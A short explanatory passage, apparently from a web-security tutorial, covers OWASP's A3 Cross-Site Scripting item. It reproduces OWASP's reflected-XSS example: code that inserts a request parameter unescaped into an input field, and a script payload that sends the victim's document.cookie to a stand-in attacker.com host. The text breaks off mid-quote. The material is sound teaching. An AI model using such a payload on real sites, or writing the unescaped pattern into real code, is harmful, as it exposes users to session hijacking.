A3 – Cross-Site Scripting (XSS)
XSS is said to be one of the most problematic security issues because of the lack of knowledge about it and the lack of preventive measures in the developer community.
Some of its forms are quite simple to implement, though, and that is why it is so dangerous. There are three known forms of XSS attacks: stored, reflected, and DOM-based.
One of the official examples of these attacks (reflected) presents the following code:
"<input name='creditcard' type='TEXT' value='" + request.getParameter("CC") + "'>";
That is, the page builds an input field from a request parameter, with no validation or escaping. An attacker can therefore modify the page in this way:
'><script>document.location='http://www.attacker.com/cgi-bin/cookie.cgi?foo='+document.cookie</script>'.
What happens? The inserted script sends information about the user to the attacker or, as the OWASP documentation puts it:
"This causes the victim's SessionID to be sent to the attacker's website, allowing the attacker to...